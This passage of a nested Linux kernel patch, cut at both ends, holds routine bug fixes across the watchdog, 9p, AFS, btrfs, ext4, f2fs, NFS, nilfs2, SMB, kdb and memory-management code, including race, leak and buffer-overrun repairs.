++		wdd->min_hw_heartbeat_ms = 955 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	case RTIWWDSIZE_3P125:
+-		/* 3.125% open window => 96.9% min heartbeat */
+-		wdd->min_hw_heartbeat_ms = 969 * heartbeat;
++		/* 3.125% open window => 98.9% min heartbeat */
++		wdd->min_hw_heartbeat_ms = 989 * heartbeat + MAX_HW_ERROR;
+ 		break;
+ 
+ 	default:
+@@ -221,14 +225,6 @@ static int rti_wdt_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	/*
+-	 * If watchdog is running at 32k clock, it is not accurate.
+-	 * Adjust frequency down in this case so that we don't pet
+-	 * the watchdog too often.
+-	 */
+-	if (wdt->freq < 32768)
+-		wdt->freq = wdt->freq * 9 / 10;
+-
+ 	pm_runtime_enable(dev);
+ 	ret = pm_runtime_resume_and_get(dev);
+ 	if (ret < 0) {
+diff --git a/fs/9p/vfs_dentry.c b/fs/9p/vfs_dentry.c
+index f89f01734587b..55990098795ec 100644
+--- a/fs/9p/vfs_dentry.c
++++ b/fs/9p/vfs_dentry.c
+@@ -50,12 +50,17 @@ static int v9fs_cached_dentry_delete(const struct dentry *dentry)
+ static void v9fs_dentry_release(struct dentry *dentry)
+ {
+ 	struct hlist_node *p, *n;
++	struct hlist_head head;
+ 
+ 	p9_debug(P9_DEBUG_VFS, " dentry: %pd (%p)\n",
+ 		 dentry, dentry);
+-	hlist_for_each_safe(p, n, (struct hlist_head *)&dentry->d_fsdata)
++
++	spin_lock(&dentry->d_lock);
++	hlist_move_list((struct hlist_head *)&dentry->d_fsdata, &head);
++	spin_unlock(&dentry->d_lock);
++
++	hlist_for_each_safe(p, n, &head)
+ 		p9_fid_put(hlist_entry(p, struct p9_fid, dlist));
+-	dentry->d_fsdata = NULL;
+ }
+ 
+ static int v9fs_lookup_revalidate(struct dentry *dentry, unsigned int flags)
+diff --git a/fs/afs/mntpt.c b/fs/afs/mntpt.c
+index 97f50e9fd9eb0..297487ee83231 100644
+--- a/fs/afs/mntpt.c
++++ b/fs/afs/mntpt.c
+@@ -140,6 +140,11 @@ static int afs_mntpt_set_params(struct fs_context *fc, struct dentry *mntpt)
+ 		put_page(page);
+ 		if (ret < 0)
+ 			return ret;
++
++		/* Don't cross a backup volume mountpoint from a backup volume */
++		if (src_as->volume && src_as->volume->type == AFSVL_BACKVOL &&
++		    ctx->type == AFSVL_BACKVOL)
++			return -ENODEV;
+ 	}
+ 
+ 	return 0;
+diff --git a/fs/btrfs/tree-log.c b/fs/btrfs/tree-log.c
+index 7c33b28c02aeb..b7a5bf88193f9 100644
+--- a/fs/btrfs/tree-log.c
++++ b/fs/btrfs/tree-log.c
+@@ -4845,18 +4845,23 @@ static int btrfs_log_prealloc_extents(struct btrfs_trans_handle *trans,
+ 			path->slots[0]++;
+ 			continue;
+ 		}
+-		if (!dropped_extents) {
+-			/*
+-			 * Avoid logging extent items logged in past fsync calls
+-			 * and leading to duplicate keys in the log tree.
+-			 */
++		/*
++		 * Avoid overlapping items in the log tree. The first time we
++		 * get here, get rid of everything from a past fsync. After
++		 * that, if the current extent starts before the end of the last
++		 * extent we copied, truncate the last one. This can happen if
++		 * an ordered extent completion modifies the subvolume tree
++		 * while btrfs_next_leaf() has the tree unlocked.
++		 */
++		if (!dropped_extents || key.offset < truncate_offset) {
+ 			ret = truncate_inode_items(trans, root->log_root, inode,
+-						   truncate_offset,
++						   min(key.offset, truncate_offset),
+ 						   BTRFS_EXTENT_DATA_KEY);
+ 			if (ret)
+ 				goto out;
+ 			dropped_extents = true;
+ 		}
++		truncate_offset = btrfs_file_extent_end(path);
+ 		if (ins_nr == 0)
+ 			start_slot = slot;
+ 		ins_nr++;
+diff --git a/fs/ext4/mballoc.h b/fs/ext4/mballoc.h
+index 00b3898df4a76..538703499d083 100644
+--- a/fs/ext4/mballoc.h
++++ b/fs/ext4/mballoc.h
+@@ -180,8 +180,8 @@ struct ext4_allocation_context {
+ 
+ 	__u32 ac_groups_considered;
+ 	__u32 ac_flags;		/* allocation hints */
++	__u32 ac_groups_linear_remaining;
+ 	__u16 ac_groups_scanned;
+-	__u16 ac_groups_linear_remaining;
+ 	__u16 ac_found;
+ 	__u16 ac_tail;
+ 	__u16 ac_buddy;
+diff --git a/fs/ext4/xattr.c b/fs/ext4/xattr.c
+index eaed9fd2f890c..28d00ed833db4 100644
+--- a/fs/ext4/xattr.c
++++ b/fs/ext4/xattr.c
+@@ -3076,8 +3076,10 @@ ext4_xattr_block_cache_find(struct inode *inode,
+ 
+ 		bh = ext4_sb_bread(inode->i_sb, ce->e_value, REQ_PRIO);
+ 		if (IS_ERR(bh)) {
+-			if (PTR_ERR(bh) == -ENOMEM)
++			if (PTR_ERR(bh) == -ENOMEM) {
++				mb_cache_entry_put(ea_block_cache, ce);
+ 				return NULL;
++			}
+ 			bh = NULL;
+ 			EXT4_ERROR_INODE(inode, "block %lu read error",
+ 					 (unsigned long)ce->e_value);
+diff --git a/fs/f2fs/inode.c b/fs/f2fs/inode.c
+index 869bb6ec107cc..35b1c672644ee 100644
+--- a/fs/f2fs/inode.c
++++ b/fs/f2fs/inode.c
+@@ -298,6 +298,12 @@ static bool sanity_check_inode(struct inode *inode, struct page *node_page)
+ 		}
+ 	}
+ 
++	if (fi->i_xattr_nid && f2fs_check_nid_range(sbi, fi->i_xattr_nid)) {
++		f2fs_warn(sbi, "%s: inode (ino=%lx) has corrupted i_xattr_nid: %u, run fsck to fix.",
++			  __func__, inode->i_ino, fi->i_xattr_nid);
++		return false;
++	}
++
+ 	return true;
+ }
+ 
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index b3b801e7c4bc5..d921d7b7bec64 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -695,9 +695,9 @@ unsigned long nfs_block_bits(unsigned long bsize, unsigned char *nrbitsp)
+ 	if ((bsize & (bsize - 1)) || nrbitsp) {
+ 		unsigned char	nrbits;
+ 
+-		for (nrbits = 31; nrbits && !(bsize & (1 << nrbits)); nrbits--)
++		for (nrbits = 31; nrbits && !(bsize & (1UL << nrbits)); nrbits--)
+ 			;
+-		bsize = 1 << nrbits;
++		bsize = 1UL << nrbits;
+ 		if (nrbitsp)
+ 			*nrbitsp = nrbits;
+ 	}
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 7cc74f7451d67..bda3050817c90 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -5441,7 +5441,7 @@ static bool nfs4_read_plus_not_supported(struct rpc_task *task,
+ 	struct rpc_message *msg = &task->tk_msg;
+ 
+ 	if (msg->rpc_proc == &nfs4_procedures[NFSPROC4_CLNT_READ_PLUS] &&
+-	    server->caps & NFS_CAP_READ_PLUS && task->tk_status == -ENOTSUPP) {
++	    task->tk_status == -ENOTSUPP) {
+ 		server->caps &= ~NFS_CAP_READ_PLUS;
+ 		msg->rpc_proc = &nfs4_procedures[NFSPROC4_CLNT_READ];
+ 		rpc_restart_call_prepare(task);
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 006df4eac9fab..dfc459a62fb30 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -2159,8 +2159,10 @@ static void nilfs_segctor_start_timer(struct nilfs_sc_info *sci)
+ {
+ 	spin_lock(&sci->sc_state_lock);
+ 	if (!(sci->sc_state & NILFS_SEGCTOR_COMMIT)) {
+-		sci->sc_timer.expires = jiffies + sci->sc_interval;
+-		add_timer(&sci->sc_timer);
++		if (sci->sc_task) {
++			sci->sc_timer.expires = jiffies + sci->sc_interval;
++			add_timer(&sci->sc_timer);
++		}
+ 		sci->sc_state |= NILFS_SEGCTOR_COMMIT;
+ 	}
+ 	spin_unlock(&sci->sc_state_lock);
+@@ -2378,10 +2380,21 @@ int nilfs_construct_dsync_segment(struct super_block *sb, struct inode *inode,
+  */
+ static void nilfs_segctor_accept(struct nilfs_sc_info *sci)
+ {
++	bool thread_is_alive;
++
+ 	spin_lock(&sci->sc_state_lock);
+ 	sci->sc_seq_accepted = sci->sc_seq_request;
++	thread_is_alive = (bool)sci->sc_task;
+ 	spin_unlock(&sci->sc_state_lock);
+-	del_timer_sync(&sci->sc_timer);
++
++	/*
++	 * This function does not race with the log writer thread's
++	 * termination.  Therefore, deleting sc_timer, which should not be
++	 * done after the log writer thread exits, can be done safely outside
++	 * the area protected by sc_state_lock.
++	 */
++	if (thread_is_alive)
++		del_timer_sync(&sci->sc_timer);
+ }
+ 
+ /**
+@@ -2407,7 +2420,7 @@ static void nilfs_segctor_notify(struct nilfs_sc_info *sci, int mode, int err)
+ 			sci->sc_flush_request &= ~FLUSH_DAT_BIT;
+ 
+ 		/* re-enable timer if checkpoint creation was not done */
+-		if ((sci->sc_state & NILFS_SEGCTOR_COMMIT) &&
++		if ((sci->sc_state & NILFS_SEGCTOR_COMMIT) && sci->sc_task &&
+ 		    time_before(jiffies, sci->sc_timer.expires))
+ 			add_timer(&sci->sc_timer);
+ 	}
+@@ -2597,6 +2610,7 @@ static int nilfs_segctor_thread(void *arg)
+ 	int timeout = 0;
+ 
+ 	sci->sc_timer_task = current;
++	timer_setup(&sci->sc_timer, nilfs_construction_timeout, 0);
+ 
+ 	/* start sync. */
+ 	sci->sc_task = current;
+@@ -2663,6 +2677,7 @@ static int nilfs_segctor_thread(void *arg)
+  end_thread:
+ 	/* end sync. */
+ 	sci->sc_task = NULL;
++	del_timer_sync(&sci->sc_timer);
+ 	wake_up(&sci->sc_wait_task); /* for nilfs_segctor_kill_thread() */
+ 	spin_unlock(&sci->sc_state_lock);
+ 	return 0;
+@@ -2726,7 +2741,6 @@ static struct nilfs_sc_info *nilfs_segctor_new(struct super_block *sb,
+ 	INIT_LIST_HEAD(&sci->sc_gc_inodes);
+ 	INIT_LIST_HEAD(&sci->sc_iput_queue);
+ 	INIT_WORK(&sci->sc_iput_work, nilfs_iput_work_func);
+-	timer_setup(&sci->sc_timer, nilfs_construction_timeout, 0);
+ 
+ 	sci->sc_interval = HZ * NILFS_SC_DEFAULT_TIMEOUT;
+ 	sci->sc_mjcp_freq = HZ * NILFS_SC_DEFAULT_SR_FREQ;
+@@ -2812,7 +2826,6 @@ static void nilfs_segctor_destroy(struct nilfs_sc_info *sci)
+ 
+ 	down_write(&nilfs->ns_segctor_sem);
+ 
+-	del_timer_sync(&sci->sc_timer);
+ 	kfree(sci);
+ }
+ 
+diff --git a/fs/smb/client/smb2transport.c b/fs/smb/client/smb2transport.c
+index 69dbd08fd4419..763cf946e8491 100644
+--- a/fs/smb/client/smb2transport.c
++++ b/fs/smb/client/smb2transport.c
+@@ -213,8 +213,8 @@ smb2_find_smb_tcon(struct TCP_Server_Info *server, __u64 ses_id, __u32  tid)
+ 	}
+ 	tcon = smb2_find_smb_sess_tcon_unlocked(ses, tid);
+ 	if (!tcon) {
+-		cifs_put_smb_ses(ses);
+ 		spin_unlock(&cifs_tcp_ses_lock);
++		cifs_put_smb_ses(ses);
+ 		return NULL;
+ 	}
+ 	spin_unlock(&cifs_tcp_ses_lock);
+diff --git a/include/linux/mmc/slot-gpio.h b/include/linux/mmc/slot-gpio.h
+index 4ae2f2908f993..d4a1567c94d0d 100644
+--- a/include/linux/mmc/slot-gpio.h
++++ b/include/linux/mmc/slot-gpio.h
+@@ -20,6 +20,7 @@ int mmc_gpiod_request_cd(struct mmc_host *host, const char *con_id,
+ 			 unsigned int debounce);
+ int mmc_gpiod_request_ro(struct mmc_host *host, const char *con_id,
+ 			 unsigned int idx, unsigned int debounce);
++int mmc_gpiod_set_cd_config(struct mmc_host *host, unsigned long config);
+ void mmc_gpio_set_cd_isr(struct mmc_host *host,
+ 			 irqreturn_t (*isr)(int irq, void *dev_id));
+ int mmc_gpio_set_cd_wake(struct mmc_host *host, bool on);
+diff --git a/include/linux/smp.h b/include/linux/smp.h
+index a80ab58ae3f1d..5b977f20c1399 100644
+--- a/include/linux/smp.h
++++ b/include/linux/smp.h
+@@ -211,6 +211,8 @@ smp_call_function_any(const struct cpumask *mask, smp_call_func_t func,
+ static inline void kick_all_cpus_sync(void) {  }
+ static inline void wake_up_all_idle_cpus(void) {  }
+ 
++#define setup_max_cpus 0
++
+ #ifdef CONFIG_UP_LATE_INIT
+ extern void __init up_late_init(void);
+ static inline void smp_init(void) { up_late_init(); }
+diff --git a/include/net/dst_ops.h b/include/net/dst_ops.h
+index 632086b2f644a..3ae2fda295073 100644
+--- a/include/net/dst_ops.h
++++ b/include/net/dst_ops.h
+@@ -24,7 +24,7 @@ struct dst_ops {
+ 	void			(*destroy)(struct dst_entry *);
+ 	void			(*ifdown)(struct dst_entry *,
+ 					  struct net_device *dev, int how);
+-	struct dst_entry *	(*negative_advice)(struct dst_entry *);
++	void			(*negative_advice)(struct sock *sk, struct dst_entry *);
+ 	void			(*link_failure)(struct sk_buff *);
+ 	void			(*update_pmtu)(struct dst_entry *dst, struct sock *sk,
+ 					       struct sk_buff *skb, u32 mtu,
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 77298c74822a6..9dab482078743 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2212,17 +2212,10 @@ sk_dst_get(struct sock *sk)
+ 
+ static inline void __dst_negative_advice(struct sock *sk)
+ {
+-	struct dst_entry *ndst, *dst = __sk_dst_get(sk);
++	struct dst_entry *dst = __sk_dst_get(sk);
+ 
+-	if (dst && dst->ops->negative_advice) {
+-		ndst = dst->ops->negative_advice(dst);
+-
+-		if (ndst != dst) {
+-			rcu_assign_pointer(sk->sk_dst_cache, ndst);
+-			sk_tx_queue_clear(sk);
+-			WRITE_ONCE(sk->sk_dst_pending_confirm, 0);
+-		}
+-	}
++	if (dst && dst->ops->negative_advice)
++		dst->ops->negative_advice(sk, dst);
+ }
+ 
+ static inline void dst_negative_advice(struct sock *sk)
+diff --git a/include/soc/qcom/cmd-db.h b/include/soc/qcom/cmd-db.h
+index c8bb56e6852a8..47a6cab75e630 100644
+--- a/include/soc/qcom/cmd-db.h
++++ b/include/soc/qcom/cmd-db.h
+@@ -1,5 +1,8 @@
+ /* SPDX-License-Identifier: GPL-2.0 */
+-/* Copyright (c) 2016-2018, The Linux Foundation. All rights reserved. */
++/*
++ * Copyright (c) 2016-2018, The Linux Foundation. All rights reserved.
++ * Copyright (c) 2024, Qualcomm Innovation Center, Inc. All rights reserved.
++ */
+ 
+ #ifndef __QCOM_COMMAND_DB_H__
+ #define __QCOM_COMMAND_DB_H__
+@@ -21,6 +24,8 @@ u32 cmd_db_read_addr(const char *resource_id);
+ 
+ const void *cmd_db_read_aux_data(const char *resource_id, size_t *len);
+ 
++bool cmd_db_match_resource_addr(u32 addr1, u32 addr2);
++
+ enum cmd_db_hw_type cmd_db_read_slave_id(const char *resource_id);
+ 
+ int cmd_db_ready(void);
+@@ -31,6 +36,9 @@ static inline u32 cmd_db_read_addr(const char *resource_id)
+ static inline const void *cmd_db_read_aux_data(const char *resource_id, size_t *len)
+ { return ERR_PTR(-ENODEV); }
+ 
++static inline bool cmd_db_match_resource_addr(u32 addr1, u32 addr2)
++{ return false; }
++
+ static inline enum cmd_db_hw_type cmd_db_read_slave_id(const char *resource_id)
+ { return -ENODEV; }
+ 
+diff --git a/init/main.c b/init/main.c
+index 2c339793511b5..e46aa00b3c997 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -607,7 +607,6 @@ static int __init rdinit_setup(char *str)
+ __setup("rdinit=", rdinit_setup);
+ 
+ #ifndef CONFIG_SMP
+-static const unsigned int setup_max_cpus = NR_CPUS;
+ static inline void setup_nr_cpu_ids(void) { }
+ static inline void smp_prepare_cpus(unsigned int maxcpus) { }
+ #endif
+diff --git a/kernel/debug/kdb/kdb_io.c b/kernel/debug/kdb/kdb_io.c
+index 67d3c48a15222..b1f79d5a5a60e 100644
+--- a/kernel/debug/kdb/kdb_io.c
++++ b/kernel/debug/kdb/kdb_io.c
+@@ -171,6 +171,33 @@ char kdb_getchar(void)
+ 	unreachable();
+ }
+ 
++/**
++ * kdb_position_cursor() - Place cursor in the correct horizontal position
++ * @prompt: Nil-terminated string containing the prompt string
++ * @buffer: Nil-terminated string containing the entire command line
++ * @cp: Cursor position, pointer the character in buffer where the cursor
++ *      should be positioned.
++ *
++ * The cursor is positioned by sending a carriage-return and then printing
++ * the content of the line until we reach the correct cursor position.
++ *
++ * There is some additional fine detail here.
++ *
++ * Firstly, even though kdb_printf() will correctly format zero-width fields
++ * we want the second call to kdb_printf() to be conditional. That keeps things
++ * a little cleaner when LOGGING=1.
++ *
++ * Secondly, we can't combine everything into one call to kdb_printf() since
++ * that renders into a fixed length buffer and the combined print could result
++ * in unwanted truncation.
++ */
++static void kdb_position_cursor(char *prompt, char *buffer, char *cp)
++{
++	kdb_printf("\r%s", kdb_prompt_str);
++	if (cp > buffer)
++		kdb_printf("%.*s", (int)(cp - buffer), buffer);
++}
++
+ /*
+  * kdb_read
+  *
+@@ -199,7 +226,6 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 						 * and null byte */
+ 	char *lastchar;
+ 	char *p_tmp;
+-	char tmp;
+ 	static char tmpbuffer[CMD_BUFLEN];
+ 	int len = strlen(buffer);
+ 	int len_tmp;
+@@ -236,12 +262,8 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			}
+ 			*(--lastchar) = '\0';
+ 			--cp;
+-			kdb_printf("\b%s \r", cp);
+-			tmp = *cp;
+-			*cp = '\0';
+-			kdb_printf(kdb_prompt_str);
+-			kdb_printf("%s", buffer);
+-			*cp = tmp;
++			kdb_printf("\b%s ", cp);
++			kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		}
+ 		break;
+ 	case 13: /* enter */
+@@ -258,19 +280,14 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			memcpy(tmpbuffer, cp+1, lastchar - cp - 1);
+ 			memcpy(cp, tmpbuffer, lastchar - cp - 1);
+ 			*(--lastchar) = '\0';
+-			kdb_printf("%s \r", cp);
+-			tmp = *cp;
+-			*cp = '\0';
+-			kdb_printf(kdb_prompt_str);
+-			kdb_printf("%s", buffer);
+-			*cp = tmp;
++			kdb_printf("%s ", cp);
++			kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		}
+ 		break;
+ 	case 1: /* Home */
+ 		if (cp > buffer) {
+-			kdb_printf("\r");
+-			kdb_printf(kdb_prompt_str);
+ 			cp = buffer;
++			kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		}
+ 		break;
+ 	case 5: /* End */
+@@ -286,11 +303,10 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 		}
+ 		break;
+ 	case 14: /* Down */
+-		memset(tmpbuffer, ' ',
+-		       strlen(kdb_prompt_str) + (lastchar-buffer));
+-		*(tmpbuffer+strlen(kdb_prompt_str) +
+-		  (lastchar-buffer)) = '\0';
+-		kdb_printf("\r%s\r", tmpbuffer);
++	case 16: /* Up */
++		kdb_printf("\r%*c\r",
++			   (int)(strlen(kdb_prompt_str) + (lastchar - buffer)),
++			   ' ');
+ 		*lastchar = (char)key;
+ 		*(lastchar+1) = '\0';
+ 		return lastchar;
+@@ -300,15 +316,6 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			++cp;
+ 		}
+ 		break;
+-	case 16: /* Up */
+-		memset(tmpbuffer, ' ',
+-		       strlen(kdb_prompt_str) + (lastchar-buffer));
+-		*(tmpbuffer+strlen(kdb_prompt_str) +
+-		  (lastchar-buffer)) = '\0';
+-		kdb_printf("\r%s\r", tmpbuffer);
+-		*lastchar = (char)key;
+-		*(lastchar+1) = '\0';
+-		return lastchar;
+ 	case 9: /* Tab */
+ 		if (tab < 2)
+ 			++tab;
+@@ -352,15 +359,25 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 			kdb_printf("\n");
+ 			kdb_printf(kdb_prompt_str);
+ 			kdb_printf("%s", buffer);
++			if (cp != lastchar)
++				kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 		} else if (tab != 2 && count > 0) {
+-			len_tmp = strlen(p_tmp);
+-			strncpy(p_tmp+len_tmp, cp, lastchar-cp+1);
+-			len_tmp = strlen(p_tmp);
+-			strncpy(cp, p_tmp+len, len_tmp-len + 1);
+-			len = len_tmp - len;
+-			kdb_printf("%s", cp);
+-			cp += len;
+-			lastchar += len;
++			/* How many new characters do we want from tmpbuffer? */
++			len_tmp = strlen(p_tmp) - len;
++			if (lastchar + len_tmp >= bufend)
++				len_tmp = bufend - lastchar;
++
++			if (len_tmp) {
++				/* + 1 ensures the '\0' is memmove'd */
++				memmove(cp+len_tmp, cp, (lastchar-cp) + 1);
++				memcpy(cp, p_tmp+len, len_tmp);
++				kdb_printf("%s", cp);
++				cp += len_tmp;
++				lastchar += len_tmp;
++				if (cp != lastchar)
++					kdb_position_cursor(kdb_prompt_str,
++							    buffer, cp);
++			}
+ 		}
+ 		kdb_nextline = 1; /* reset output line number */
+ 		break;
+@@ -371,13 +388,9 @@ static char *kdb_read(char *buffer, size_t bufsize)
+ 				memcpy(cp+1, tmpbuffer, lastchar - cp);
+ 				*++lastchar = '\0';
+ 				*cp = key;
+-				kdb_printf("%s\r", cp);
++				kdb_printf("%s", cp);
+ 				++cp;
+-				tmp = *cp;
+-				*cp = '\0';
+-				kdb_printf(kdb_prompt_str);
+-				kdb_printf("%s", buffer);
+-				*cp = tmp;
++				kdb_position_cursor(kdb_prompt_str, buffer, cp);
+ 			} else {
+ 				*++lastchar = '\0';
+ 				*cp++ = key;
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 4976522e3e481..9a5bdf1e8e92a 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5277,25 +5277,28 @@ static inline void mas_fill_gap(struct ma_state *mas, void *entry,
+  * @size: The size of the gap
+  * @fwd: Searching forward or back
+  */
+-static inline void mas_sparse_area(struct ma_state *mas, unsigned long min,
++static inline int mas_sparse_area(struct ma_state *mas, unsigned long min,
+ 				unsigned long max, unsigned long size, bool fwd)
+ {
+-	unsigned long start = 0;
+-
+-	if (!unlikely(mas_is_none(mas)))
+-		start++;
++	if (!unlikely(mas_is_none(mas)) && min == 0) {
++		min++;
++		/*
++		 * At this time, min is increased, we need to recheck whether
++		 * the size is satisfied.
++		 */
++		if (min > max || max - min + 1 < size)
++			return -EBUSY;
++	}
+ 	/* mas_is_ptr */
+ 
+-	if (start < min)
+-		start = min;
+-
+ 	if (fwd) {
+-		mas->index = start;
+-		mas->last = start + size - 1;
+-		return;
++		mas->index = min;
++		mas->last = min + size - 1;
++	} else {
++		mas->last = max;
++		mas->index = max - size + 1;
+ 	}
+-
+-	mas->index = max;
++	return 0;
+ }
+ 
+ /*
+@@ -5324,10 +5327,8 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 		return -EBUSY;
+ 
+ 	/* Empty set */
+-	if (mas_is_none(mas) || mas_is_ptr(mas)) {
+-		mas_sparse_area(mas, min, max, size, true);
+-		return 0;
+-	}
++	if (mas_is_none(mas) || mas_is_ptr(mas))
++		return mas_sparse_area(mas, min, max, size, true);
+ 
+ 	/* The start of the window can only be within these values */
+ 	mas->index = min;
+@@ -5367,20 +5368,18 @@ int mas_empty_area_rev(struct ma_state *mas, unsigned long min,
+ 	if (min >= max)
+ 		return -EINVAL;
+ 
+-	if (mas_is_start(mas)) {
++	if (mas_is_start(mas))
+ 		mas_start(mas);
+-		mas->offset = mas_data_end(mas);
+-	} else if (mas->offset >= 2) {
+-		mas->offset -= 2;
+-	} else if (!mas_rewind_node(mas)) {
++	else if ((mas->offset < 2) && (!mas_rewind_node(mas)))
+ 		return -EBUSY;
+-	}
+ 
+-	/* Empty set. */
+-	if (mas_is_none(mas) || mas_is_ptr(mas)) {
+-		mas_sparse_area(mas, min, max, size, false);
+-		return 0;
+-	}
++	if (unlikely(mas_is_none(mas) || mas_is_ptr(mas)))
++		return mas_sparse_area(mas, min, max, size, false);
++	else if (mas->offset >= 2)
++		mas->offset -= 2;
++	else
++		mas->offset = mas_data_end(mas);
++
+ 
+ 	/* The start of the window can only be within these values. */
+ 	mas->index = min;
+diff --git a/mm/cma.c b/mm/cma.c
+index 30b6ca30009bb..01e9d0b2d8757 100644
+--- a/mm/cma.c
++++ b/mm/cma.c
+@@ -186,10 +186,6 @@ int __init cma_init_reserved_mem(phys_addr_t base, phys_addr_t size,
+ 	if (!size || !memblock_is_region_reserved(base, size))
+ 		return -EINVAL;
+ 
+-	/* alignment should be aligned with order_per_bit */
+-	if (!IS_ALIGNED(CMA_MIN_ALIGNMENT_PAGES, 1 << order_per_bit))
+-		return -EINVAL;
+-
+ 	/* ensure minimal alignment required by mm core */
+ 	if (!IS_ALIGNED(base | size, CMA_MIN_ALIGNMENT_BYTES))
+ 		return -EINVAL;
+diff --git a/mm/huge_memory.c b/mm/huge_memory.c
+index 9736e762184bd..1b7f5950d6037 100644
+--- a/mm/huge_memory.c
++++ b/mm/huge_memory.c
+@@ -2108,32 +2108,11 @@ static void __split_huge_pmd_locked(struct vm_area_struct *vma, pmd_t *pmd,
+ 		return __split_huge_zero_page_pmd(vma, haddr, pmd);
+ 	}
+ 
+-	/*
+-	 * Up to this point the pmd is present and huge and userland has the
+-	 * whole access to the hugepage during the split (which happens in
+-	 * place). If we overwrite the pmd with the not-huge version pointing
+-	 * to the pte here (which of course we could if all CPUs were bug
+-	 * free), userland could trigger a small page size TLB miss on the
+-	 * small sized TLB while the hugepage TLB entry is still established in
+-	 * the huge TLB. Some CPU doesn't like that.
+-	 * See http://support.amd.com/TechDocs/41322_10h_Rev_Gd.pdf, Erratum
+-	 * 383 on page 105. Intel should be safe but is also warns that it's
+-	 * only safe if the permission and cache attributes of the two entries
+-	 * loaded in the two TLB is identical (which should be the case here).
+-	 * But it is generally safer to never allow small and huge TLB entries
+-	 * for the same virtual address to be loaded simultaneously. So instead
+-	 * of doing "pmd_populate(); flush_pmd_tlb_range();" we first mark the
+-	 * current pmd notpresent (atomically because here the pmd_trans_huge
+-	 * must remain set at all times on the pmd until the split is complete
+-	 * for this pmd), then we flush the SMP TLB and finally we write the
+-	 * non-huge version of the pmd entry with pmd_populate.
+-	 */
+-	old_pmd = pmdp_invalidate(vma, haddr, pmd);
+-
+-	pmd_migration = is_pmd_migration_entry(old_pmd);
++	pmd_migration = is_pmd_migration_entry(*pmd);
+ 	if (unlikely(pmd_migration)) {
+ 		swp_entry_t entry;
+ 
++		old_pmd = *pmd;
+ 		entry = pmd_to_swp_entry(old_pmd);
+ 		page = pfn_swap_entry_to_page(entry);
+ 		write = is_writable_migration_entry(entry);
+@@ -2144,6 +2123,30 @@ static void __split_huge_pmd_locked(struct vm_area_struct *vma, pmd_t *pmd,
+ 		soft_dirty = pmd_swp_soft_dirty(old_pmd);
+ 		uffd_wp = pmd_swp_uffd_wp(old_pmd);
+ 	} else {
++		/*
++		 * Up to this point the pmd is present and huge and userland has
++		 * the whole access to the hugepage during the split (which
++		 * happens in place). If we overwrite the pmd with the not-huge
++		 * version pointing to the pte here (which of course we could if
++		 * all CPUs were bug free), userland could trigger a small page
++		 * size TLB miss on the small sized TLB while the hugepage TLB
++		 * entry is still established in the huge TLB. Some CPU doesn't
++		 * like that. See
++		 * http://support.amd.com/TechDocs/41322_10h_Rev_Gd.pdf, Erratum
++		 * 383 on page 105. Intel should be safe but is also warns that
++		 * it's only safe if the permission and cache attributes of the
++		 * two entries loaded in the two TLB is identical (which should
++		 * be the case here). But it is generally safer to never allow
++		 * small and huge TLB entries for the same virtual address to be
++		 * loaded simultaneously. So instead of doing "pmd_populate();
++		 * flush_pmd_tlb_range();" we first mark the current pmd
++		 * notpresent (atomically because here the pmd_trans_huge must
++		 * remain set at all times on the pmd until the split is
++		 * complete for this pmd), then we flush the SMP TLB and finally
++		 * we write the non-huge version of the pmd entry with
++		 * pmd_populate.
++		 */
++		old_pmd = pmdp_invalidate(vma, haddr, pmd);
+ 		page = pmd_page(old_pmd);
+ 		if (pmd_dirty(old_pmd)) {
+ 			dirty = true;
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 4361dcf70139f..87a14638fad09 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -7669,9 +7669,9 @@ void __init hugetlb_cma_reserve(int order)
+ 		 * huge page demotion.
+ 		 */
+ 		res = cma_declare_contiguous_nid(0, size, 0,
+-						PAGE_SIZE << HUGETLB_PAGE_ORDER,
+-						 0, false, name,
+-						 &hugetlb_cma[nid], nid);
++					PAGE_SIZE << HUGETLB_PAGE_ORDER,
++					HUGETLB_PAGE_ORDER, false, name,
++					&hugetlb_cma[nid], nid);
+ 		if (res) {
+ 			pr_warn("hugetlb_cma: reservation failed: err %d, node %d",
+ 				res, nid);
+diff --git a/mm/kmsan/core.c b/mm/kmsan/core.c
+index 112dce135c7f6..dff759f32bbb3 100644
+--- a/mm/kmsan/core.c
++++ b/mm/kmsan/core.c
+@@ -258,8 +258,7 @@ void kmsan_internal_set_shadow_origin(void *addr, size_t size, int b,
+ 				      u32 origin, bool checked)
+ {
+ 	u64 address = (u64)addr;
+-	void *shadow_start;
+-	u32 *origin_start;
++	u32 *shadow_start, *origin_start;
+ 	size_t pad = 0;
+ 
+ 	KMSAN_WARN_ON(!kmsan_metadata_is_contiguous(addr, size));
+@@ -287,8 +286,16 @@ void kmsan_internal_set_shadow_origin(void *addr, size_t size, int b,
+ 	origin_start =
+ 		(u32 *)kmsan_get_metadata((void *)address, KMSAN_META_ORIGIN);
+ 
+-	for (int i = 0; i < size / KMSAN_ORIGIN_SIZE; i++)
+-		origin_start[i] = origin;
++	/*
